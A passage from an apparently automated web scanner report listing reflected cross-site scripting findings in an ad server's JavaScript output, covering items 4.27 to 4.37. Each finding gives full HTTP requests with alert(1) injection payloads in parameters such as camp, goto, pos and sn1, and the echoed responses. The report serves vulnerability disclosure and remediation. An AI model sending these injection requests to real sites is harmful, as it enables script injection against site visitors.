B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ff51d'-alert(1)-'ce15ab17f86&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a
...[SNIP]...

4.27. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ece3a"-alert(1)-"92527edee20 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ece3a"-alert(1)-"92527edee20&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4ece3a"-alert(1)-"92527edee20&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=a
...[SNIP]...

4.28. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1264b'-alert(1)-'3e77e92286a was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=1264b'-alert(1)-'3e77e92286a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=1264b'-alert(1)-'3e77e92286ahttp://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.29. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3f4"-alert(1)-"ed84a2146c5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=aa3f4"-alert(1)-"ed84a2146c5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=aa3f4"-alert(1)-"ed84a2146c5http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "
...[SNIP]...

4.30. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52120"-alert(1)-"e9a993e1182 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&52120"-alert(1)-"e9a993e1182=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6713

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&52120"-alert(1)-"e9a993e1182=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

4.31. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eb3b'-alert(1)-'47541a30f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&1eb3b'-alert(1)-'47541a30f9f=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:22:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6713

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=&1eb3b'-alert(1)-'47541a30f9f=1http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt\">
...[SNIP]...

4.32. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eab1c'-alert(1)-'f3739ac3557 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryeab1c'-alert(1)-'f3739ac3557&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryeab1c'-alert(1)-'f3739ac3557&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-
...[SNIP]...

4.33. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fec93"-alert(1)-"12a793669de was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfec93"-alert(1)-"12a793669de&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
91%3B4307-300/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfec93"-alert(1)-"12a793669de&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-
...[SNIP]...

4.34. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e822"-alert(1)-"4c3ac561287 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle5e822"-alert(1)-"4c3ac561287&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle5e822"-alert(1)-"4c3ac561287&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel
...[SNIP]...

4.35. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2c4d'-alert(1)-'30c800381f4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddlee2c4d'-alert(1)-'30c800381f4&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B39292242/39310029/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt149603_249520%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddlee2c4d'-alert(1)-'30c800381f4&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotel
...[SNIP]...

4.36. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0b14"-alert(1)-"7dfe82f805d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacfb0b14"-alert(1)-"7dfe82f805d&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacfb0b14"-alert(1)-"7dfe82f805d&goto=http://www.hyatt.com/hyatt/specials/offers/offer-details_hotels_20.jsp?offerId=35001298&src=agn_phd_htp_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

4.37. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B5008440.7 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B5008440.7

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5acee'-alert(1)-'0d1577c5b6e was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B5008440.7;sz=300x250;pc=nyt149603_249520;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Awaken_1564321-nyt4&ad=Hyatt_Awaken-300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=d3de58a5/368bacf5acee'-alert(1)-'0d1577c5b6e&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:21:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6701

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Nov 10 10:44:19 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
